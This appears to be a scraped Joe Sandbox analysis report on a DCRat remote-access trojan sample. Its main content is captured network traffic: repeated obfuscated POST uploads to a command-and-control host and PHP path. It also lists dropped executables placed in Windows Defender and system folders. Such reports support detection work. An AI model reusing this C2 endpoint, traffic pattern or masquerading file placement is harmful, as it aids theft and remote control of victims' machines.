Jan 7, 2025 11:57:18.151851892 CET	2536	OUT	Data Raw: 50 53 5c 5a 5f 44 59 53 5a 59 51 55 5a 58 50 51 55 52 5b 5a 55 52 54 5b 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: PS\Z_DYSZYQUZXPQUR[ZURT[YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%]*1.\>0;]!$0%<08=X'16. W)4T'; 0/.%[/ Q-8
Jan 7, 2025 11:57:18.439106941 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:18.573005915 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:21.611577034 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:22.266911030 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:22.335910082 CET	2536	OUT	Data Raw: 55 5d 59 5e 5f 43 59 55 5a 59 51 55 5a 5b 50 55 55 56 5b 53 55 55 54 5e 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]Y^_CYUZYQUZ[PUUV[SUUT^YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%Y*1(U$5/0%4Q$^&3/![5#)_,W3$4$\:4%[/ Q-
Jan 7, 2025 11:57:22.602164030 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:22.048356056 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 1856 Expect: 100-continue
Jan 7, 2025 11:57:22.401784897 CET	1856	OUT	Data Raw: 55 5d 5c 58 5f 48 5c 51 5a 59 51 55 5a 5b 50 54 55 57 5b 5b 55 52 54 59 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]\X_H\QZYQUZ[PTUW[[URTYYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&+"_<<!0$%?389\',9Z!.<S*9W%<' ?,$%[/ Q-
Jan 7, 2025 11:57:22.721086979 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:22.893515110 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 26 5e 35 42 3f 1a 30 13 30 09 24 5e 26 55 2b 54 21 5e 3f 30 35 01 30 01 38 0f 26 3f 20 02 21 5a 34 41 29 11 03 5d 36 09 29 0c 25 13 28 5c 00 1b 24 11 33 0b 33 52 2a 22 26 11 27 24 2e 5c 25 54 2c 59 23 3d 31 0c 21 17 0b 53 23 3d 2f 0b 2d 2e 33 1c 3f 24 20 06 2e 37 28 05 37 29 20 51 0d 17 38 1a 24 10 34 5e 24 02 31 00 21 37 12 1c 20 36 39 10 32 3c 22 10 25 3e 3b 10 3f 00 38 5b 36 2c 04 00 21 28 0a 0f 22 04 29 0b 29 06 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: &^5B?00$^&U+T!^?0508&? !Z4A)]6)%(\$33R*"&'$.\%T,Y#=1!S#=/-.3?$ .7(7) Q8$4^$1!7 692<"%>;?8[6,!("))#]" R3XO

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:23.469995022 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:23.824059963 CET	2536	OUT	Data Raw: 50 58 5c 5b 5f 44 59 53 5a 59 51 55 5a 54 50 53 55 55 5b 5d 55 54 54 5b 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: PX\[_DYSZYQUZTPSUU[]UTT[YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&?!!?3(500 V3860=" =)0$/<\7;,$%[/ Q-
Jan 7, 2025 11:57:24.132811069 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:24.285155058 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:24.640384912 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:24.995634079 CET	2532	OUT	Data Raw: 55 5d 5c 58 5f 41 5c 50 5a 59 51 55 5a 5c 50 53 55 54 5b 59 55 57 54 5d 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]\X_A\PZYQUZ\PSUT[YUWT]YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%Y+?3;\" ?Z0% $809">#*)'0,448_:4%[/ Q-0
Jan 7, 2025 11:57:25.282749891 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:25.410613060 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:25.901210070 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:26.245579958 CET	2536	OUT	Data Raw: 50 5e 5c 5b 5f 47 59 55 5a 59 51 55 5a 5e 50 51 55 5f 5b 5b 55 52 54 5d 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: P^\[_GYUZYQUZ^PQU_[[URT]YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%(W1<050 '&43^)&?>"X<V*_0S',8##$Y:4%[/ Q-
Jan 7, 2025 11:57:26.538075924 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:26.667781115 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:26.826067924 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:27.183049917 CET	2536	OUT	Data Raw: 55 5f 5c 5a 5f 49 59 57 5a 59 51 55 5a 58 50 5c 55 55 5b 5b 55 5f 54 5f 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U_\Z_IYWZYQUZXP\UU[[U_T_YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&?<;!?$C4Q0("$,5()''7 -$%[/ Q-8
Jan 7, 2025 11:57:27.462770939 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:27.595046997 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:27.908358097 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 1856 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:28.262236118 CET	1856	OUT	Data Raw: 55 5a 5c 58 5f 43 59 51 5a 59 51 55 5a 54 50 5c 55 53 5b 5f 55 54 54 5e 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UZ\X_CYQZYQUZTP\US[_UTT^YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&<=</Z"#8'6#0;0Z!- R)*0U3?(^7/94%[/ Q-
Jan 7, 2025 11:57:28.564624071 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:28.696059942 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 25 02 35 24 20 0e 33 04 24 0d 24 2b 2a 1c 3f 54 21 5e 3f 30 22 11 25 2b 2f 54 31 12 3b 10 22 3f 37 1d 3e 3c 31 59 23 33 35 09 31 39 28 5c 00 1b 24 13 27 0c 34 0b 2a 54 32 53 25 34 2d 04 26 0b 24 58 35 13 29 09 21 5f 2a 0e 34 5b 38 52 2e 00 33 52 3c 1d 3b 5c 3a 09 3c 03 20 39 20 51 0d 17 3b 0e 24 2e 05 07 24 3c 3a 11 21 09 23 09 22 25 31 5b 25 2f 2a 5b 26 2d 30 04 3f 07 33 01 35 3c 3a 05 35 38 30 0c 20 3a 2a 53 28 3c 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: %5$ 3$$+?T!^?0"%+/T1;"?7><1Y#3519(\$'4T2S%4-&$X5)!_4[8R.3R<;\:< 9 Q;$.$<:!#"%1[%/[&-0?35<:580 :*S(<#]" R3XO

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Z90Z9bYzPa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Internet Explorer\en-GB\91e168f4ec1147

C:\Program Files (x86)\Internet Explorer\en-GB\SgrmBroker.exe

C:\Program Files (x86)\Internet Explorer\en-GB\SgrmBroker.exe:Zone.Identifier

C:\Program Files\Windows Defender\en-US\6e10d114dd40fd

C:\Program Files\Windows Defender\en-US\UdtvoblhRrdVjJaLCN.exe

C:\Program Files\Windows Defender\en-US\UdtvoblhRrdVjJaLCN.exe:Zone.Identifier

C:\ProgramData\Microsoft\UEV\Scripts\6e10d114dd40fd

C:\ProgramData\Microsoft\UEV\Scripts\UdtvoblhRrdVjJaLCN.exe

C:\ProgramData\Microsoft\UEV\Scripts\UdtvoblhRrdVjJaLCN.exe:Zone.Identifier

C:\Recovery\5940a34987c991

C:\Recovery\6e10d114dd40fd

Windows Analysis Report
Z90Z9bYzPa.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:28.065671921 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:28.417445898 CET	2536	OUT	Data Raw: 55 58 59 58 5a 42 5c 57 5a 59 51 55 5a 5a 50 51 55 54 5b 5e 55 55 54 5b 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UXYXZB\WZYQUZZPQUT[^UUT[YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%?>]?3'^5 <'& %+9Y'!_6/)9%,#4U':4%[/ Q-0
Jan 7, 2025 11:57:28.730254889 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:28.913186073 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:29.103249073 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:29.448698044 CET	2536	OUT	Data Raw: 55 58 59 59 5f 41 59 5a 5a 59 51 55 5a 5b 50 5d 55 51 5b 5c 55 56 54 59 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UXYY_AYZZYQUZ[P]UQ[\UVTYYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&<%?^!0/\&573;>06!.,V>''<4\ 0]:%[/ Q-
Jan 7, 2025 11:57:29.757549047 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:29.889111996 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:30.064829111 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:30.417532921 CET	2536	OUT	Data Raw: 55 5d 5c 58 5f 49 5c 55 5a 59 51 55 5a 58 50 56 55 5f 5b 58 55 51 54 5d 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]\X_I\UZYQUZXPVU_[XUQT]YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&+":]?,5 8$&?'8)\0<!X".3*9'$<^ 0 :%[/ Q-8
Jan 7, 2025 11:57:30.705317020 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:30.839889050 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:30.990420103 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:31.339304924 CET	2536	OUT	Data Raw: 55 5d 5c 5d 5f 49 59 5a 5a 59 51 55 5a 58 50 53 55 55 5b 5e 55 53 54 59 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U]\]_IYZZYQUZXPSUU[^USTYYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%^+W"\(0?53<'5<T3"$=!> U=<T%?4#3;.%[/ Q-8
Jan 7, 2025 11:57:31.637020111 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:31.773108006 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:31.930207968 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:32.276842117 CET	2536	OUT	Data Raw: 50 58 5c 5f 5a 43 59 55 5a 59 51 55 5a 5f 50 56 55 50 5b 5d 55 51 54 58 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: PX\_ZCYUZYQUZ_PVUP[]UQTXYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&<<0<"3$$60'"$&#>3(9$$'#^-$%[/ Q-$
Jan 7, 2025 11:57:32.587357044 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:32.718866110 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:32.878413916 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:33.229931116 CET	2536	OUT	Data Raw: 50 5b 5c 5b 5f 49 59 54 5a 59 51 55 5a 58 50 55 55 57 5b 5b 55 52 54 5a 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: P[\[_IYTZYQUZXPUUW[[URTZYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&<:]?#'_ 3/Z'5<$;&3?5!= =)$W'?(X7,$%[/ Q-8

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:33.393003941 CET	286	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 253252 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:33.745734930 CET	12360	OUT	Data Raw: 55 5f 59 5c 5f 47 5c 55 5a 59 51 55 5a 58 50 57 55 54 5b 5c 55 55 54 5e 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U_Y\_G\UZYQUZXPWUT[\UUT^YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%?""]+3']60,$3:0<5X"=$V(*<0?4 0,,$%[/ Q-8
Jan 7, 2025 11:57:33.750965118 CET	22248	OUT	Data Raw: 3e 38 26 3e 3f 03 3f 21 00 2d 53 13 32 25 53 3b 35 53 02 3e 08 03 1d 15 3e 5c 23 08 30 32 1d 01 3a 3f 03 07 0f 52 3f 1f 34 25 0c 2b 26 02 3d 3e 3b 2f 06 3e 34 25 1d 5f 39 3c 32 20 08 02 28 54 0c 2a 3d 23 3d 5f 5a 11 26 2e 1a 3f 3d 2f 0f 41 24 3a Data Ascii: >8&>??!-S2%S;5S>>\#02:?R?4%+&=>;/>4%_9<2 (T=#=_Z&.?=/A$:+^:!8;99 9.=97V9#:1R0>W?]8)'$XHY"-;V)9#?>Z;#+_-1>%;5>X-;%)D/$88<>[ 0)< (4V(?&=4C568<.PYP;&#$79
Jan 7, 2025 11:57:33.751198053 CET	2472	OUT	Data Raw: 06 51 34 59 3a 56 1a 54 31 0b 25 57 0a 25 26 5f 39 0b 3f 2a 3e 2c 07 31 3b 3b 0f 55 08 31 37 3a 02 07 24 17 30 27 3b 5c 03 51 30 2e 26 5b 33 2f 3f 26 3f 20 30 06 24 5a 24 06 29 04 36 25 33 2a 0f 36 2e 1e 24 3e 00 1f 3d 3d 06 1f 37 3e 05 32 0d 5b Data Ascii: Q4Y:VT1%W%&_9?>,1;;U17:$0';\Q0.&[3/?&? 0$Z$)6%36.$>==7>2[86<==?5)+&,X$<$9;?&(13+0_2#38871S9V)$26$+-=?8""U[:4? ;:?!X?-)]$,<UPU&6/3:6( ? >]')$!->V3[?-.3^.1Z731<>\0.
